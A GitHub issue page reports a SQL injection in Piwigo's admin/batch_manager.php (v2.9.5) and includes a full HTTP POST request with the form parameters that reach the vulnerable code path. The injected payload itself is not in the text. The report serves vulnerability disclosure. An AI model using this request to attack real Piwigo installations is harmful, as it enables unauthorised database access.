Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection in admin/batch_manager.php #1012

Closed
zongdeiqianxing opened this issue May 8, 2019 · 1 comment
Closed

SQL injection in admin/batch_manager.php #1012

zongdeiqianxing opened this issue May 8, 2019 · 1 comment
Assignees
Milestone

Comments

@zongdeiqianxing
Copy link

hi,There is a vulnerability in the admin/batch_manager.php.
image

I didn't find the full trigger request in the browser, so I added the ‘&filter_category_use=on’ parameter to the request based on the code.

POST /admin.php?page=batch_manager HTTP/1.1
Host: 10.150.10.186:30002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30002/admin.php?page=batch_manager
Content-Type: application/x-www-form-urlencoded
Content-Length: 695
Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=85b6lvm6f6nqvji17k04ugkdu0
Connection: close
Upgrade-Insecure-Requests: 1

start=0&pwg_token=438d258aad10f5b13c74425475163e4e&filter_prefilter_use=on&filter_prefilter=last_import&filter_duplicate
s_date=on&filter_category=1&tag_mode=AND&filter_level=03&filter_dimension_min_width=145&filter_dimension_max_width=2560&
filter_dimension_min_height=91&filter_dimension_max_height=1440&filter_dimension_min_ratio=1.29&filter_dimension_max_rat
io=1.77&filter_search_use=on&q=&filter_filesize_use=on&filter_category_use=on&filter_filesize_min=1.3&filter_filesize_ma
x=1.3&submitFilter=&selectAction=-1&associate=1&dissociate=1&author=&title=&date_creation=2019-05-08+00%3A00%3A00&level=
0&regenerateSuccess=0&regenerateError=0

image
image
image
image

@plegall plegall added this to the 2.9.6 milestone May 31, 2019
@plegall plegall changed the title Piwigo v2.9.5 - SQL injection in admin/batch_manager.php SQL injection in admin/batch_manager.php Aug 12, 2019
@plegall
Copy link
Member

plegall commented Aug 12, 2019

discovered on Piwigo v2.9.5

@plegall plegall self-assigned this Aug 12, 2019
@plegall plegall modified the milestones: 2.9.6, 2.10.0RC1 Aug 12, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants